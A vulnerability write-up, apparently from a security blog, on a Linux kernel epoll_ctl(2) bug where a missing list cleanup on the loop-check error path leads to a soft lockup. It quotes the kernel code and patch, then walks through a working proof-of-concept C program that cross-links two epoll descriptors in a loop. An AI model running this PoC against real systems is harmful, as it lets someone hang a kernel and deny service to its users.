This vulnerability was reported by Yurij M. Plotnikov as you can read in this email of LKML. The susceptible code resides in fs/eventpoll.c and specifically in the epoll_ctl(2) system call’s code.



/* * The following function implements the controller interface for * the eventpoll file that enables the insertion/removal/change of * file descriptors inside the interest set. */ SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd, struct epoll_event __user *, event) { int error; int did_lock_epmutex = 0; struct file *file, *tfile; struct eventpoll *ep; struct epitem *epi; struct epoll_event epds; error = -EFAULT; if (ep_op_has_event(op) && copy_from_user(&epds, event, sizeof(struct epoll_event))) goto error_return; ... if (op == EPOLL_CTL_ADD) { if (is_file_epoll(tfile)) { error = -ELOOP; if (ep_loop_check(ep, tfile) != 0) goto error_tgt_fput; } } else list_add(&tfile->f_tfile_llink, &tfile_check_list); } ... error_tgt_fput: if (did_lock_epmutex) mutex_unlock(&epmutex); fput(tfile); error_fput: fput(file); error_return: return error; }

As you can read, if the opcode is ‘EPOLL_CTL_ADD’ it will first check if the requested file is an event by verifying its callback functions using the below routine.



static const struct file_operations eventpoll_fops; static inline int is_file_epoll(struct file *f) { return f->f_op == &eventpoll_fops; }

However, if this check fails it will set the ‘error’ to ‘-ELOOP’ and move to the ep_loop_check() which verifies that no closed loop or deep chains will be created by adding the passed epoll file. If this fails it will jump to ‘error_tgt_fput’ to unlock and exit.

As Yurij M. Plotnikov pointed out, this code does not clear ‘tfile_check_list’ resulting in leaving open the file descriptors. The patch was to add the missing call.



if (is_file_epoll(tfile)) { error = -ELOOP; - if (ep_loop_check(ep, tfile) != 0) + if (ep_loop_check(ep, tfile) != 0) { + clear_tfile_check_list(); goto error_tgt_fput; + } } else

And here is the code of the missing call:



static void clear_tfile_check_list(void) { struct file *file; /* first clear the tfile_check_list */ while (!list_empty(&tfile_check_list)) { file = list_first_entry(&tfile_check_list, struct file, f_tfile_llink); list_del_init(&file->f_tfile_llink); } INIT_LIST_HEAD(&tfile_check_list); }

Finally, Yurij M. Plotnikov also provided a PoC code to reproduce a kernel soft lockup. Here is this code.



#include <netinet/in.h> #include <sys/epoll.h> #include <errno.h> int main () { struct sockaddr_in addr; struct epoll_event event; int epfd1, epfd2, sock; int rc; int i = 0; while (1) { printf("ITERATION %d

", ++i); epfd1 = epoll_create(1); printf("epoll_create() -> %d(%d)

", epfd1, errno); epfd2 = epoll_create(1); printf("epoll_create() -> %d(%d)

", epfd2, errno);

It enters a ‘while’ loop and opens two epoll file descriptors.



sock = socket(PF_INET, SOCK_STREAM, 0); printf("socket() -> %d(%d)

", sock, errno); addr.sin_family = AF_INET; addr.sin_port = 0; addr.sin_addr.s_addr = 0; rc = bind(sock, (struct sockaddr*)&addr, sizeof(addr)); printf("bind() -> %d(%d)

", rc, errno); rc = listen(sock, 1); printf("listen() -> %d(%d)

", rc, errno);

Next, he opens a socket file descriptor and makes it passive by invoking listen(2) system call.



event.data.fd = sock; event.events = 0; rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, sock, &event); printf("epoll_ctl() -> %d(%d)

", rc, errno);

It invokes the buggy system call passing ‘epfd1’ pointing to the socket file descriptor.



event.data.fd = epfd2; event.events = EPOLLIN; rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, epfd2, &event); printf("epoll_ctl() -> %d(%d)

", rc, errno); event.data.fd = epfd1; event.events = EPOLLIN; rc = epoll_ctl(epfd2, EPOLL_CTL_ADD, epfd1, &event); printf("epoll_ctl() -> %d(%d)

", rc, errno);

Then he adds the two epoll file descriptors.



rc = close(epfd1); printf("close(epfd1) -> %d(%d)

", rc, errno); rc = close(epfd2); printf("close(epfd2) -> %d(%d)

", rc, errno); rc = close(sock); printf("close(sock) -> %d(%d)

", rc, errno); sleep(1); printf("



"); } return 0; }

At the end of the loop, it attempts to close all of the opened file descriptors and wait for 1 second until the next iteration.



As you can see, the last calls to epoll_ctl(2) system call were passing file descriptors which were pointing to each other. This leads to a loop resulting in reaching the vulnerable code and since the file descriptors are not properly closed, it will eventually lead to a kernel soft lockup after a couple of iterations.